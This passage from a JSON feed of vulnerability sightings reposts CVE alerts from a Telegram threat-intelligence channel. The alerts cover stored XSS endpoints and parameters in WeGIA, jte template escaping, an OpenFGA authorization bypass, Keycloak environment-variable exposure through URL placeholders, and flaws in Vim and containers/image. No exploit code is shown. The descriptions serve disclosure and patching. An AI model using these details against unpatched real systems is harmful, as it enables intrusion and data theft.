https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "72b6cb0d-46bd-45e1-8c24-1854eea0a426", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VH22-6C6H-RM8Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1379", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23026\n\ud83d\udd39 Description: jte (Java Template Engine) is a secure and lightweight template engine for Java and Kotlin. In affected versions Jte HTML templates with `script` tags or script attributes that include a Javascript template string (backticks) are subject to XSS. The `javaScriptBlock` and `javaScriptAttribute` methods in the `Escape` class do not escape backticks, which are used for Javascript template strings. Dollar signs in template strings should also be escaped as well to prevent undesired interpolation. HTML templates rendered by Jte's `OwaspHtmlTemplateOutput` in versions less than or equal to `3.1.15` with `script` tags or script attributes that contain Javascript template strings (backticks) are vulnerable. Users are advised to upgrade to version 3.1.16 or later to resolve this issue. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T19:36:03.286Z\n\ud83d\udccf Modified: 2025-01-13T19:36:03.286Z\n\ud83d\udd17 References:\n1. https://github.com/casid/jte/security/advisories/GHSA-vh22-6c6h-rm8q\n2. https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#description\n3. https://github.com/casid/jte/blob/main/jte-runtime/src/main/java/gg/jte/html/escape/Escape.java#L43-L83", "creation_timestamp": "2025-01-13T20:07:40.000000Z"}, {"uuid": "33e1b243-a70c-4d80-9705-093cbf8e6680", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WR55-2952-79RH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1381", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22614\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `dependente_editarInfoPessoal.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `nome` and `SobrenomeForm`parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `dependente_editarInfoPessoal.php` parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T20:58:11.230Z\n\ud83d\udccf Modified: 2025-01-13T20:58:11.230Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wr55-2952-79rh\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/8eb446f132ceba002559da2fd8745386096d494e", "creation_timestamp": "2025-01-13T21:11:23.000000Z"}, {"uuid": "57d5286c-4c44-482b-a430-b9668fdebc19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32Q6-RR98-CJQV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1424", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56323\n\ud83d\udd39 Description: OpenFGA is an authorization/permission engine. IN OpenFGA v1.3.8 to v1.8.2 (Helm chart openfga-0.1.38 to openfga-0.2.19, docker v1.3.8 to v.1.8.2)  are vulnerable to authorization bypass under the following conditions: 1. calling Check API or ListObjects with a model that uses [conditions](https://openfga.dev/docs/modeling/conditions), and 2. calling Check API or ListObjects API with [contextual tuples](https://openfga.dev/docs/concepts#what-are-contextual-tuples) that include conditions and 3. OpenFGA is configured with caching enabled (`OPENFGA_CHECK_QUERY_CACHE_ENABLED`). Users are advised to upgrade to v1.8.3. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T21:33:30.556Z\n\ud83d\udccf Modified: 2025-01-14T00:29:58.019Z\n\ud83d\udd17 References:\n1. https://github.com/openfga/openfga/security/advisories/GHSA-32q6-rr98-cjqv", "creation_timestamp": "2025-01-14T01:07:30.000000Z"}, {"uuid": "79ee4f06-584a-415b-9824-183ee7455829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XM3H-X3RV-WHR5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1385", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22616\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `dependente_parentesco_adicionar.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `descricao` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `dependente_parentesco_adicionar.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T20:54:46.800Z\n\ud83d\udccf Modified: 2025-01-13T20:54:46.800Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xm3h-x3rv-whr5\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/1825e235aa4ab1b8b641a02c3ec8bc32ea7a8433", "creation_timestamp": "2025-01-13T21:11:36.000000Z"}, {"uuid": "aa051abb-ae66-4701-878d-2fabb9b75b0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0299", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1464", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11736\n\ud83d\udd39 Description: A vulnerability was found in Keycloak. Admin users may have to access sensitive server environment variables and system properties through user-configurable URLs. When configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.\n\ud83d\udccf Published: 2025-01-14T08:36:08.583Z\n\ud83d\udccf Modified: 2025-01-14T08:36:08.583Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11736\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328850", "creation_timestamp": "2025-01-14T09:10:34.000000Z"}, {"uuid": "25ee86ed-6dfb-4dde-8492-4f39e745e552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0300", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1464", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11736\n\ud83d\udd39 Description: A vulnerability was found in Keycloak. Admin users may have to access sensitive server environment variables and system properties through user-configurable URLs. When configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.\n\ud83d\udccf Published: 2025-01-14T08:36:08.583Z\n\ud83d\udccf Modified: 2025-01-14T08:36:08.583Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11736\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328850", "creation_timestamp": "2025-01-14T09:10:34.000000Z"}, {"uuid": "dd3e3cd8-4577-4dc2-a16f-f8bc8f503b2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2775-42RH-535Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1391", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22618\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_cargo.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `cargo` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `adicionar_cargo.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in release version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T20:50:30.664Z\n\ud83d\udccf Modified: 2025-01-13T20:50:30.664Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2775-42rh-535q\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/f3b1cd90e33b790b6b2049c69d22c6d50fe965a1", "creation_timestamp": "2025-01-13T21:11:53.000000Z"}, {"uuid": "e602a35a-aa18-4b7c-870f-ad3cc7b2dc10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RGF-26WJ-48V8", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1397", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22134\n\ud83d\udd39 Description: When switching to other buffers using the :all command and visual mode still being active, this may cause a heap-buffer overflow, because Vim does not properly end visual mode and therefore may try to access beyond the end of a line in a buffer. In Patch 9.1.1003 Vim will correctly reset the visual mode before opening other windows and buffers and therefore fix this bug. In addition it does verify that it won't try to access a position if the position is greater than the corresponding buffer line. Impact is medium since the user must have switched on visual mode when executing the :all ex command. The Vim project would like to thank github user gandalf4a for reporting this issue. The issue has been fixed as of Vim patch v9.1.1003\n\ud83d\udccf Published: 2025-01-13T20:41:08.144Z\n\ud83d\udccf Modified: 2025-01-13T20:41:08.144Z\n\ud83d\udd17 References:\n1. https://github.com/vim/vim/security/advisories/GHSA-5rgf-26wj-48v8\n2. https://github.com/vim/vim/commit/c9a1e257f1630a0866447e53a564f7ff96a80ead", "creation_timestamp": "2025-01-13T21:12:13.000000Z"}, {"uuid": "4f925b69-05ce-42bc-9ce9-4cca75c64568", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8260", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "17416423-ec54-469a-a226-8f982a05c074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3718", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "95603936-90c6-4ae8-9ff1-38b9505c6496", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7174", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "8b5c86fd-c70f-40e7-9d7c-f6c8739f617c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0045", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "5fe215b7-0f11-4542-9802-9a1acb10f6b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9960", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "7f42fb8a-4a71-4b6c-9509-9efa91a7b6a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4613", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "cff4650a-e0f6-4b27-a52b-34872db6094c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4159", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "b5ddc845-dcf4-4272-b312-70a66f97e015", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7187", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 